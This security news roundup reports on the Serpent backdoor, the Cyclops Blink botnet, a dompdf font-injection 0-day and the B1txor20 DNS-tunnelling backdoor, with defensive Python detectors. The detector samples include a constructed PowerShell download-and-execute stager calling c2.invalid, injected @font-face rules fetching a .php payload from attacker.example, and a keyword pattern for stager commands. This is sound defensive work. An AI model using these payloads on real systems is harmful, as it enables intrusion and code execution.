A New Backdoor Targeting Windows: Serpent
A new backdoor, named Serpent, has been identified in attacks targeting French construction, real estate, and government organizations. It is installed with the help of legitimate, widely used Windows package managers.
The attack chain begins with targeted phishing e-mails that deliver macro-enabled Microsoft Word documents posing as material related to the European Union General Data Protection Regulation (GDPR). When the target enables the macros, a seemingly harmless image file is downloaded from a remote server. The image, however, carries a Base64-encoded PowerShell script hidden by steganography. That PowerShell script installs Chocolatey, the Python package manager pip, and the PySocks proxy library on the Windows machine. The same script then downloads a second image file from the same remote server; this one contains the Serpent backdoor, which can execute commands sent by the C2 server.
Besides steganography, the campaign's reliance on widely used, legitimate package managers also appears to be an attempt to evade detection. The campaign has not been attributed to a known threat actor, but it is believed to be the work of a sophisticated group. In this context, it is recommended not to open attachments or follow links in unsolicited e-mails from unknown senders, to raise awareness among institution/organization personnel of such advanced phishing attacks, and to use reliable anti-virus / anti-malware solutions. In addition, the IoCs published for the campaign should be blocked in the security solutions in use.
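The delivery step above rests on an image file that is still a valid image but carries Base64-encoded PowerShell after the point where a viewer stops reading. The following is an added example, not code from the original report or from the actors involved: it builds a constructed PNG (and a degenerate JPEG stand-in), appends a constructed downloader one-liner in the same style, and then scans the bytes that follow the image's logical end (the PNG IEND chunk, the JPEG EOI marker) for Base64 runs that decode to PowerShell. The marker list, the sample script, and the host name `c2.invalid` are assumptions for illustration; real implants may use other encodings or pixel-level steganography, which this trailing-data check does not cover.

```python
import base64
import binascii
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

# Constructed stand-in for a downloader stage; NOT the real Serpent script.
SAMPLE_PS = "$wc = New-Object Net.WebClient; IEX $wc.DownloadString('http://c2.invalid/stage2.png')"

# Strings that commonly appear in PowerShell download-and-execute stagers (assumed list).
PS_MARKERS = re.compile(
    r"(Invoke-Expression|\bIEX\b|Net\.WebClient|DownloadString|DownloadFile|"
    r"FromBase64String|Start-Process|EncodedCommand)",
    re.IGNORECASE,
)
# A Base64 run long enough to be worth decoding (40+ alphabet chars plus optional padding).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(trailing: bytes = b"") -> bytes:
    """Build a valid 1x1 RGB PNG and append arbitrary bytes after IEND (constructed test data)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit depth, RGB
    raw = b"\x00\x00\x00\x00"  # filter byte + one black pixel
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", zlib.compress(raw))
            + _png_chunk(b"IEND", b"") + trailing)


def trailing_bytes(blob: bytes) -> bytes:
    """Return whatever follows the image's logical end: the PNG IEND chunk or the JPEG EOI marker."""
    if blob.startswith(PNG_SIGNATURE):
        pos = len(PNG_SIGNATURE)
        while pos + 8 <= len(blob):
            length = struct.unpack(">I", blob[pos:pos + 4])[0]
            ctype = blob[pos + 4:pos + 8]
            end = pos + 12 + length  # length field + type + data + CRC
            if end > len(blob):
                return b""  # truncated file
            if ctype == b"IEND":
                return blob[end:]
            pos = end
        return b""
    if blob.startswith(JPEG_SOI):
        # Last EOI marker; assumes the appended data is text (Base64 never contains 0xFF).
        eoi = blob.rfind(JPEG_EOI)
        return blob[eoi + 2:] if eoi != -1 else b""
    return b""


def find_hidden_powershell(blob: bytes) -> list:
    """Decode Base64 runs found after the image end; return those that look like PowerShell."""
    hits = []
    for match in B64_RUN.finditer(trailing_bytes(blob)):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        # Try UTF-8 first, then UTF-16LE (the encoding powershell -EncodedCommand expects).
        for encoding in ("utf-8", "utf-16-le"):
            try:
                text = decoded.decode(encoding)
            except UnicodeDecodeError:
                continue
            if PS_MARKERS.search(text):
                hits.append(text)
                break
    return hits


def sample_png_with_payload() -> bytes:
    """Constructed PNG with a Base64 UTF-8 PowerShell stager appended after IEND."""
    return build_png(b"\n# filler\n" + base64.b64encode(SAMPLE_PS.encode("utf-8")) + b"\n")


def sample_jpeg_with_utf16_payload() -> bytes:
    """Constructed minimal JPEG (SOI+EOI only) with a UTF-16LE stager appended after EOI."""
    return JPEG_SOI + JPEG_EOI + base64.b64encode(SAMPLE_PS.encode("utf-16-le"))


if __name__ == "__main__":
    for name, data in (("clean png", build_png()), ("png+payload", sample_png_with_payload()),
                       ("jpeg+utf16 payload", sample_jpeg_with_utf16_payload())):
        print(name, "->", find_hidden_powershell(data))
```

Run over a mail gateway's or proxy's saved image attachments, the check is cheap and has few false positives, since legitimate images rarely carry long Base64 runs after their end marker. It is deliberately narrow: a payload spread across pixel values, or encoded with something other than Base64, would need a different extractor.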
Cyclops Blink Botnet Targets ASUS Routers and WatchGuard Devices
Cyclops Blink, a botnet attributed to the Russian state-backed Sandworm APT group, has been found targeting ASUS routers and WatchGuard Firebox devices in a new attack campaign. A joint advisory on Cyclops Blink was recently published by the UK National Cyber Security Centre (NCSC), CISA, NSA, and FBI.
First spotted in 2019, the Cyclops Blink malware is written in C and communicates with its command and control (C2) server over TCP. It uses OpenSSL functions to encrypt the data it collects and uses brute-force techniques to gain access to targeted systems. Cyclops Blink also includes modules responsible for maintaining persistence on the target device, downloading additional payloads, and transferring data to the C&C servers. These modules are as follows:
Asus (0x38): This module lets the malware read from and write to the device's flash memory. Flash memory is where the device stores its operating system, configuration, and the entire file system. Because flash contents survive reboots, this module is used to persist on the device and potentially survive a factory reset.
System Reconnaissance (0x08): This module sends information about the infected device to the C&C server. The collected information includes:
- the current Linux version,
- memory usage of the device,
- the contents of the following files:
  - /etc/passwd
  - /etc/group
  - /proc/mounts
  - /proc/partitions
- information about the network interfaces.
File Download (0x0f): This module downloads additional files and payloads from the internet.
Cyclops Blink is known to target other security solution vendors besides ASUS and WatchGuard; those vendors have not yet been notified because not enough malware samples have been obtained. ASUS has stated that it is aware of the attacks and that its investigation of the campaign is continuing. To avoid becoming a target of attacks carried out with this malware, it is recommended to reset affected devices to factory defaults, apply the latest firmware updates immediately, and replace the default administrator credentials with ones that follow a strong password policy. ASUS also recommends keeping the Remote Management function disabled (it is off by default).
New 0-Day in Dompdf PDF Converter Library
A 0-day vulnerability has been identified in dompdf, a PHP-based HTML to PDF conversion library, that could lead to remote code execution in specific configurations.
To execute code on the target system, an attacker first makes the vulnerable site load a malicious font file whose name carries a .php extension, by injecting a CSS @font-face rule through an XSS flaw; dompdf fetches the file and stores it on the web server under its font directory. The attacker then requests that cached .php file through the vulnerable website, which triggers remote code execution. The vulnerability can have severe consequences for websites that generate PDFs server-side, such as ticket purchases and payslips, especially when user input is not sanitized well enough to prevent XSS and the dompdf library is installed in a publicly accessible directory.
According to statistics published by GitHub, dompdf has 59,250 known installations. Dompdf 1.2.0 and earlier versions are vulnerable when the “$isRemoteEnabled” option is set to true and the library is located in a directory reachable over the Internet. Versions 0.8.5 and earlier, however, are affected even when this option is set to “false.” Until an update that fixes the vulnerability is released, users of vulnerable dompdf versions are advised to move dompdf outside the web directory, set “$isRemoteEnabled” to “false,” and harden the application by sanitizing user input against XSS.
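The trigger in this chain is a user-controlled @font-face rule whose src points at a remote URL with a non-font extension. The following is an added example, not dompdf's own code: a pre-render check written in Python that pulls every url() out of the @font-face blocks in untrusted HTML/CSS, flags sources that are remote or whose path does not end in a font extension, and can strip the blocks entirely before the document reaches the renderer. The sample document, the host name attacker.example and the extension allow-list are constructed for illustration; the check is regex-based and is a stop-gap next to the permanent measures above (upgrade, `$isRemoteEnabled = false`, library outside the web root), not a replacement for them.

```python
import os
import re
from urllib.parse import urlparse

# Extensions a font loader should be allowed to fetch (assumed allow-list).
FONT_EXTENSIONS = {".ttf", ".otf", ".woff", ".woff2", ".eot"}

# One @font-face block (CSS font-face blocks do not nest, so stop at the first '}').
FONT_FACE_RE = re.compile(r"@font-face\s*\{([^}]*)\}", re.IGNORECASE)
# url(...) with optional quotes; stops at a quote, ')' or whitespace.
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)""", re.IGNORECASE)

# Constructed untrusted input: one legitimate local font and two injected remote .php "fonts".
SAMPLE_HTML = """<html><head><style>
@font-face { font-family: 'Body'; src: url('fonts/Roboto-Regular.ttf'); }
@font-face { font-family: 'evil'; src: url("http://attacker.example/payload.php"); }
@FONT-FACE { font-family: 'evil2'; src: url(//attacker.example/payload2.php?x.ttf); }
</style></head><body style="font-family: 'evil'">Ticket #1234</body></html>"""


def font_face_sources(document: str) -> list:
    """Return every url(...) referenced inside an @font-face block, in document order."""
    sources = []
    for block in FONT_FACE_RE.finditer(document):
        sources.extend(URL_RE.findall(block.group(1)))
    return sources


def suspicious_font_sources(document: str) -> list:
    """Return font sources that are remote (scheme or host present) or not a font file type."""
    flagged = []
    for src in font_face_sources(document):
        parsed = urlparse(src)
        remote = bool(parsed.scheme) or bool(parsed.netloc)  # catches http://, //host/, data:
        ext = os.path.splitext(parsed.path)[1].lower()       # extension of the path, not the query
        if remote or ext not in FONT_EXTENSIONS:
            flagged.append(src)
    return flagged


def strip_font_face(document: str) -> str:
    """Remove all @font-face blocks so the renderer cannot be told to fetch fonts at all."""
    return FONT_FACE_RE.sub("", document)


def safe_for_render(document: str) -> bool:
    """Gate to place in front of the PDF renderer: False if any font source is suspicious."""
    return not suspicious_font_sources(document)


if __name__ == "__main__":
    print("sources:", font_face_sources(SAMPLE_HTML))
    print("flagged:", suspicious_font_sources(SAMPLE_HTML))
    print("safe to render:", safe_for_render(SAMPLE_HTML))
    print("safe after strip:", safe_for_render(strip_font_face(SAMPLE_HTML)))
```

The extension check looks at the URL path rather than the raw string, so `payload2.php?x.ttf` is still flagged; the query string is exactly where an attacker would park a reassuring suffix. Stylesheets pulled in through `<link>` tags are not covered here, which is one more reason to keep remote fetching disabled in the library itself.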
A New Linux Backdoor Deployed Through Log4Shell Vulnerabilities
Security researchers at 360 Netlab have detected a new Linux backdoor that is deployed through the Log4Shell vulnerabilities and communicates with its command and control (C&C) servers over a DNS tunnel.
According to the researchers' analysis, the backdoor, named “B1txor20,” targets Linux systems on ARM and x64 CPU architectures, spreads through the Apache Log4j (Log4Shell) vulnerabilities disclosed at the end of 2021, and uses DNS tunnelling to build its C&C channel. In addition to traditional backdoor functions, B1txor20 provides a SOCKS5 proxy, downloads rootkit payloads from a remote server, and steals data. Notably, the sample contains a number of functions that are implemented but never used, which suggests that the developers of B1txor20 are still developing and customizing functionality for different scenarios. Once it has infected a vulnerable system, the malware takes the sensitive information it has collected, the results of executed commands, and anything else destined for the C&C servers, hides it with specific encoding techniques, and sends it out as DNS requests.
Since their disclosure, the Log4Shell vulnerabilities have been actively exploited by a wide range of threat actors, including state-sponsored groups and ransomware gangs, and the number of malware families that exploit them has grown significantly. In this context, it is recommended to immediately apply the updates that fix these vulnerabilities to systems exposed to Log4Shell and to keep systems and software up to date. It is also essential to use reliable anti-virus / anti-malware solutions and to block the IoCs published for this malware in the security solutions in use.
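A DNS tunnel of the kind described above shows up on the resolver as a stream of long, high-entropy, never-repeating subdomains under one parent domain. The following is an added example, not 360 Netlab's tooling and not B1txor20's own encoding: a detector in Python that reads a constructed resolver query log, measures the length and Shannon entropy of each name's subdomain part, and reports parent domains that accumulate many distinct tunnel-like subdomains. The log format, the thresholds (30 characters, 3.5 bits, 3 unique names) and the domain `example-tunnel.test` are assumptions chosen for the sample; on real traffic the thresholds need tuning against CDN and telemetry names, which the sample includes to show the false-positive cases.

```python
import math
from collections import defaultdict

# Constructed resolver log (not real B1txor20 traffic). Line format: "<epoch> <client-ip> <qname> <qtype>"
SAMPLE_LOG = """\
1647340001 10.0.0.5 www.example.com A
1647340002 10.0.0.5 mail.example.com MX
1647340003 10.0.0.9 d1a2b3c4d5e6f7g8h.cloudfront.example A
1647340004 10.0.0.5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.com A
1647340005 10.0.0.7 3f8a1c5e7b9d2046.e6c0d4b8a2f19375.example-tunnel.test A
1647340006 10.0.0.7 9b2e7d1f4a0c6358.5d0f3a7c1e9b2864.example-tunnel.test TXT
1647340007 10.0.0.7 a8c3e1f6b0d92475.7e4b9a2d0c5f8163.example-tunnel.test A
1647340008 10.0.0.7 f2d7b3e8a1c40956.1c9f5e0b7a3d6482.example-tunnel.test TXT
1647340009 10.0.0.5 www.example.com A
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's symbol distribution (0.0 for empty or single-symbol input)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str, parent_labels: int = 2) -> tuple:
    """Split a query name into (subdomain part, parent domain) using the last N labels as parent."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-parent_labels]), ".".join(labels[-parent_labels:])


def is_tunnel_like(subdomain: str, min_len: int = 30, min_entropy: float = 3.5) -> bool:
    """Tunnel heuristic: the encoded payload (labels without dots) is both long and high-entropy."""
    payload = subdomain.replace(".", "")
    return len(payload) >= min_len and shannon_entropy(payload) >= min_entropy


def find_tunnel_candidates(log_text: str, min_unique: int = 3) -> dict:
    """Return {parent domain: number of distinct tunnel-like subdomains} for parents over the threshold."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than fail on them
        qname = parts[2]
        subdomain, parent = split_name(qname)
        if is_tunnel_like(subdomain):
            seen[parent].add(subdomain)  # a tunnel never repeats names; count distinct ones only
    return {parent: len(subs) for parent, subs in seen.items() if len(subs) >= min_unique}


if __name__ == "__main__":
    print(find_tunnel_candidates(SAMPLE_LOG))
```

Counting distinct subdomains per parent is what separates a tunnel from a busy but legitimate host: the long-but-repetitive `aaaa…` name fails the entropy test, the CDN-style hash label fails the length test, and only the parent that receives several unique, dense names is reported. Pairing the result with the record type mix (TXT and other large-answer types are favoured by tunnels) and with the querying host list gives the incident responder the machine to pull for the Log4Shell follow-up.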